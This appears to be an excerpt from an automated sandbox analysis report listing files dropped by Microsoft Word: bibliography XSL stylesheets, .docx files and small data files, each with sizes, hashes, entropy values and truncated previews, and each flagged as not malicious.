                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):268317
                                                                                                                            Entropy (8bit):5.05419861997223
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:JwprAJLR95vtfb8p4bgWPzDCvCmvQursq7vImej/yQzSS1apSiQhHDOruvoVeMUh:N9
                                                                                                                            MD5:51D32EE5BC7AB811041F799652D26E04
                                                                                                                            SHA1:412193006AA3EF19E0A57E16ACF86B830993024A
                                                                                                                            SHA-256:6230814BF5B2D554397580613E20681752240AB87FD354ECECF188C1EABE0E97
                                                                                                                            SHA-512:5FC5D889B0C8E5EF464B76F0C4C9E61BDA59B2D1205AC9417CC74D6E9F989FB73D78B4EB3044A1A1E1F2C00CE1CA1BD6D4D07EEADC4108C7B124867711C31810
                                                                                                                            Malicious:false
                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):255948
                                                                                                                            Entropy (8bit):5.103631650117028
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:gwprAm795vtfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkAgRMBHcTCwsHe5a:kW
                                                                                                                            MD5:9888A214D362470A6189DEFF775BE139
                                                                                                                            SHA1:32B552EB3C73CD7D0D9D924C96B27A86753E0F97
                                                                                                                            SHA-256:C64ED5C2A323C00E84272AD3A701CAEBE1DCCEB67231978DE978042F09635FA7
                                                                                                                            SHA-512:8A75FC2713003FA40B9730D29C786C76A796F30E6ACE12064468DD2BB4BF97EF26AC43FFE1158AB1DB06FF715D2E6CDE8EF3E8B7C49AA1341603CE122F311073
                                                                                                                            Malicious:false
                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):251032
                                                                                                                            Entropy (8bit):5.102652100491927
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:hwprA5R95vtfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1XkaNPQTlvB2zr:JA
                                                                                                                            MD5:F425D8C274A8571B625EE66A8CE60287
                                                                                                                            SHA1:29899E309C56F2517C7D9385ECDBB719B9E2A12B
                                                                                                                            SHA-256:DD7B7878427276AF5DBF8355ECE0D1FE5D693DF55AF3F79347F9D20AE50DB938
                                                                                                                            SHA-512:E567F283D903FA533977B30FD753AA1043B9DDE48A251A9AC6777A3B67667443FEAD0003765A630D0F840B6C275818D2F903B6CB56136BEDCC6D9BDD20776564
                                                                                                                            Malicious:false
                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):284415
                                                                                                                            Entropy (8bit):5.00549404077789
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:N9G5o7Fv0ZcxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27hlwNR57johqBXlwNR2b:y
                                                                                                                            MD5:33A829B4893044E1851725F4DAF20271
                                                                                                                            SHA1:DAC368749004C255FB0777E79F6E4426E12E5EC8
                                                                                                                            SHA-256:C40451CADF8944A9625DD690624EA1BA19CECB825A67081E8144AD5526116924
                                                                                                                            SHA-512:41C1F65E818C2757E1A37F5255E98F6EDEAC4214F9D189AD09C6F7A51F036768C1A03D6CFD5845A42C455EE189D13BB795673ACE3B50F3E1D77DAFF400F4D708
                                                                                                                            Malicious:false
                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):294178
                                                                                                                            Entropy (8bit):4.977758311135714
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:ydkJ3yU0orh0SCLVXyMFsoiOjWIm4vW2uo4hfhf7v3uH4NYYP4BpBaZTTSSamEUD:b
                                                                                                                            MD5:0C9731C90DD24ED5CA6AE283741078D0
                                                                                                                            SHA1:BDD3D7E5B0DE9240805EA53EF2EB784A4A121064
                                                                                                                            SHA-256:ABCE25D1EB3E70742EC278F35E4157EDB1D457A7F9D002AC658AAA6EA4E4DCDF
                                                                                                                            SHA-512:A39E6201D6B34F37C686D9BD144DDD38AE212EDA26E3B81B06F1776891A90D84B65F2ABC5B8F546A7EFF3A62D35E432AF0254E2F5BFE4AA3E0CF9530D25949C0
                                                                                                                            Malicious:false
                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):270198
                                                                                                                            Entropy (8bit):5.073814698282113
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:JwprAiaR95vtfb8pDbgWPzDCvCmvQursq7vImej/yQ4SS1apSiQhHDOruvoVeMUX:We
                                                                                                                            MD5:FF0E07EFF1333CDF9FC2523D323DD654
                                                                                                                            SHA1:77A1AE0DD8DBC3FEE65DD6266F31E2A564D088A4
                                                                                                                            SHA-256:3F925E0CC1542F09DE1F99060899EAFB0042BB9682507C907173C392115A44B5
                                                                                                                            SHA-512:B4615F995FAB87661C2DBE46625AA982215D7BDE27CAFAE221DCA76087FE76DA4B4A381943436FCAC1577CB3D260D0050B32B7B93E3EB07912494429F126BB3D
                                                                                                                            Malicious:false
                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):217137
                                                                                                                            Entropy (8bit):5.068335381017074
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:AwprA3Z95vtf58pb1WP2DCvCmvQursq7vIme5QyQzSS1apSiQhHDlruvoVeMUwFj:4P
                                                                                                                            MD5:3BF8591E1D808BCCAD8EE2B822CC156B
                                                                                                                            SHA1:9CC1E5EFD715BD0EAE5AF983FB349BAC7A6D7BA0
                                                                                                                            SHA-256:7194396E5C833E6C8710A2E5D114E8E24338C64EC9818D51A929D57A5E4A76C8
                                                                                                                            SHA-512:D434A4C15DA3711A5DAAF5F7D0A5E324B4D94A04B3787CA35456BFE423EAC9D11532BB742CDE6E23C16FA9FD203D3636BD198B41C7A51E7D3562D5306D74F757
                                                                                                                            Malicious:false
                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):254875
                                                                                                                            Entropy (8bit):5.003842588822783
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:MwprAnniNgtfbzbOWPuv7kOMBLitjAUjTQLrYHwR0TnyDkHqV3iPr1zHX5T6SSXj:a
                                                                                                                            MD5:377B3E355414466F3E3861BCE1844976
                                                                                                                            SHA1:0B639A3880ACA3FD90FA918197A669CC005E2BA4
                                                                                                                            SHA-256:4AC5B26C5E66E122DE80243EF621CA3E1142F643DD2AD61B75FF41CFEE3DFFAF
                                                                                                                            SHA-512:B050AD52A8161F96CBDC880DD1356186F381B57159F5010489B04528DB798DB955F0C530465AB3ECD5C653586508429D98336D6EB150436F1A53ABEE0697AEB9
                                                                                                                            Malicious:false
                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):344303
                                                                                                                            Entropy (8bit):5.023195898304535
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:UwprANnsqvtfL/vF/bkWPRMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iD:6
                                                                                                                            MD5:F079EC5E2CCB9CD4529673BCDFB90486
                                                                                                                            SHA1:FBA6696E6FA918F52997193168867DD3AEBE1AD6
                                                                                                                            SHA-256:3B651258F4D0EE1BFFC7FB189250DED1B920475D1682370D6685769E3A9346DB
                                                                                                                            SHA-512:4FFFA59863F94B3778F321DA16C43B92A3053E024BDD8C5317077EA1ECC7B09F67ECE3C377DB693F3432BF1E2D947EC5BF8E88E19157ED08632537D8437C87D6
                                                                                                                            Malicious:false
                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):250983
                                                                                                                            Entropy (8bit):5.057714239438731
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:JwprA6OS95vtfb8p4bgWPzkhUh9I5/oBRSifJeg/yQzvapSiQhHZeruvoXMUw3im:uP
                                                                                                                            MD5:F883B260A8D67082EA895C14BF56DD56
                                                                                                                            SHA1:7954565C1F243D46AD3B1E2F1BAF3281451FC14B
                                                                                                                            SHA-256:EF4835DB41A485B56C2EF0FF7094BC2350460573A686182BC45FD6613480E353
                                                                                                                            SHA-512:D95924A499F32D9B4D9A7D298502181F9E9048C21DBE0496FA3C3279B263D6F7D594B859111A99B1A53BD248EE69B867D7B1768C42E1E40934E0B990F0CE051E
                                                                                                                            Malicious:false
                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Word 2007+
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):51826
                                                                                                                            Entropy (8bit):5.541375256745271
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:erH5dYPCA4t3aEFGiSUDtYfEbi5Ry/AT7/6tHODaFlDSomurYNfT4A0VIwWNS89u:Q6Cbh9tENyWdaFUSYNfZS89/3qtEu
                                                                                                                            MD5:2AB22AC99ACFA8A82742E774323C0DBD
                                                                                                                            SHA1:790F8B56DF79641E83A16E443A75A66E6AA2F244
                                                                                                                            SHA-256:BC9D45D0419A08840093B0BF4DCF96264C02DFE5BD295CD9B53722E1DA02929D
                                                                                                                            SHA-512:E5715C0ECF35CE250968BD6DE5744D28A9F57D20FD6866E2AF0B2D8C8F80FEDC741D48F554397D61C5E702DA896BD33EED92D778DBAC71E2E98DCFB0912DE07B
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........R.@c}LN4...........[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG.Cd.n.j.{/......V....c..^^.E.H?H.........B.........<...Ae.l.]..{....mK......B....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Word 2007+
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):47296
                                                                                                                            Entropy (8bit):6.42327948041841
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:768:ftjI1BT8N37szq00s7dB2wMVJGHR97/RDU5naXUsT:fJIPTfq0ndB2w1bpsE
                                                                                                                            MD5:5A53F55DD7DA8F10A8C0E711F548B335
                                                                                                                            SHA1:035E685927DA2FECB88DE9CAF0BECEC88BC118A7
                                                                                                                            SHA-256:66501B659614227584DA04B64F44309544355E3582F59DBCA3C9463F67B7E303
                                                                                                                            SHA-512:095BD5D1ACA2A0CA3430DE2F005E1D576AC9387E096D32D556E4348F02F4D658D0E22F2FC4AA5BF6C07437E6A6230D2ABF73BBD1A0344D73B864BC4813D60861
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK........<dSA4...T...P.......[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^\-o..D....n_d.jq...gwg.t........:?/..}..Vu5...rQ..7..X.Q."./g..o....f....YB......<..w?...ss..e.4Y}}...0.Y...........u3V.o..r...5....7bA..Us.z.`.r(.Y>.&DVy.........6.T...e.|..g.%<...9a.&...7...}3:B.......<...!...:..7w...y..
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Word 2007+
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):34415
                                                                                                                            Entropy (8bit):7.352974342178997
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:768:ev13NPo9o5NGEVIi3kvH+3SMdk7zp3tE2:ev13xoOE+R3BkR7
                                                                                                                            MD5:7CDFFC23FB85AD5737452762FA36AAA0
                                                                                                                            SHA1:CFBC97247959B3142AFD7B6858AD37B18AFB3237
                                                                                                                            SHA-256:68A8FBFBEE4C903E17C9421082E839144C205C559AFE61338CBDB3AF79F0D270
                                                                                                                            SHA-512:A0685FD251208B772436E9745DA2AA52BC26E275537688E3AB44589372D876C9ACE14B21F16EC4053C50EB4C8E11787E9B9D922E37249D2795C5B7986497033E
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........Y5B#.W ............[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG=.HK...........&o[B....z.7.o...&.......[.oL_7cuN..&e..ccAo...YW......8...Y>.&DVy...-&.*...Y.....4.u.., !po....9W....g..F...*+1....d,'...L.M[-~.Ey. ......[
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Word 2007+
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):3465076
                                                                                                                            Entropy (8bit):7.898517227646252
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:98304:n8ItVaN7vTMZ9IBbaETXbI8ItVaN7vTMZ9IBbaEiXbY:8ItwNX9BvTvItwNX9BvoM
                                                                                                                            MD5:8BC84DB5A3B2F8AE2940D3FB19B43787
                                                                                                                            SHA1:3A5FE7B14D020FAD0E25CD1DF67864E3E23254EE
                                                                                                                            SHA-256:AF1FDEEA092169BF794CDC290BCA20AEA07AC7097D0EFCAB76F783FA38FDACDD
                                                                                                                            SHA-512:558F52C2C79BF4A3FBB8BB7B1C671AFD70A2EC0B1BDE10AC0FED6F5398E53ED3B2087B38B7A4A3D209E4F1B34150506E1BA362E4E1620A47ED9A1C7924BB9995
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........Y5B................[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.....g.../i..b../..}.-......U.....o.7B.......}@[..4o...E9n..h...Y....D.%......F....g..-!.|p.....7.pQVM.....B.g.-.7....:...d.2...7bA..Us.z.`.r..,.m."..n....s.O^.....fL.........7.....-...gn,J..iU..$.......i...(..dz.....3|
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):18
                                                                                                                            Entropy (8bit):2.725480556997868
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:QRi54vl:QP9
                                                                                                                            MD5:A5E51FDFAF429614FB5218AB559D299A
                                                                                                                            SHA1:262EC76760BB9A83BCFF955C985E70820DF567AE
                                                                                                                            SHA-256:3E82E9F60CE38815C28B0E5323268BDA212A84C3A9C7ACCC731360F998DF0240
                                                                                                                            SHA-512:9B68F1C04BDE0024CECFC05A37932368CE2F09BD96C72AB0442E16C8CF5456ED9BB995901095AC1BBDF645255014A5E43AADEE475564F01CA6BE3889C96C29C9
                                                                                                                            Malicious:false
                                                                                                                            Preview:..t.o.r.r.e.s.....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):2
                                                                                                                            Entropy (8bit):1.0
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Qn:Qn
                                                                                                                            MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                            Malicious:false
                                                                                                                            Preview:..
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):12
                                                                                                                            Entropy (8bit):0.41381685030363374
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:/l:
                                                                                                                            MD5:E4A1661C2C886EBB688DEC494532431C
                                                                                                                            SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                                                                                            SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                                                                                            SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                                                                                            Malicious:false
                                                                                                                            Preview:............
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):12
                                                                                                                            Entropy (8bit):0.41381685030363374
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:/l:
                                                                                                                            MD5:E4A1661C2C886EBB688DEC494532431C
                                                                                                                            SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                                                                                            SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                                                                                            SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                                                                                            Malicious:false
                                                                                                                            Preview:............
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
